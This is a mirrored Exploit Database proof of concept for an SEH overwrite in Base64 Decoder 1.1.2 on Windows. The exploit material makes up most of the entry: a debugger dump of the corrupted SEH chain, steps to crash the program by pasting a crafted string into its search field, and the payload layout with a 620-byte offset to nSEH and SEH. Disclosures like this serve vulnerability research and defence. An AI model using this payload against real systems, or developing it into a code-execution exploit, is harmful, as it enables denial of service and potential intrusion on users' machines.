Base64 Decoder 1.1.2 – Overwrite (SEH) (PoC)

• Exploit Database
• 16 阅读

• 作者： Un_N0n
  日期： 2015-12-21
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39070/

• ********************************************************************************************
  # Exploit: b64dec SEH OverWrite.
  # Date: 12/18/2015
  # Exploit Author: Un_N0n
  # Vendor: Tim Rohlfs
  # Software Link: http://4mhz.de/b64dec.html
  # Version: 1.1.2
  # Tested on: Windows 7 x64(64bit)
  ********************************************************************************************
  
  [Dump]
  
  SEH chain of thread 00000EC0
  AddressSE handler
  024CFC50 b64dec.00458140
  024CFC5C b64dec.004581B3
  024CFF28 b64dec.0045847C
  024CFF00 41414141 <-------
  41414141 *** CORRUPT ENTRY ***<-------
  ----------------------------------------------------
  024CFEE4 41414141AAAA
  024CFEE8 41414141AAAA
  024CFEEC 41414141AAAA
  024CFEF0 41414141AAAA
  024CFEF4 41414141AAAA
  024CFEF8 41414141AAAA
  024CFEFC 41414141AAAA
  024CFF00 41414141AAAAPointer to next SEH record<-----
  024CFF04 41414141AAAASE handler<----- 
  024CFF08 41414141AAAA
  024CFF0C 41414141AAAA
  024CFF10 41414141AAAA
  024CFF14 41414141AAAA
  024CFF18 41414141AAAA
  
  
  [How to?]
  1 - Open up b64dec.exe
  2 - In Search field, paste in the contents of Crash.txt
  3 - Hit 'Decode'
  
  ~ Software Crashes due to SEH Over-Write.
  
  [Crash.txt?]
  AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD
  
  --------------------------------------|-----|
  									 NSEHSEH
  
  [Extra Info]
  Offset = 620
  ********************************************************************************************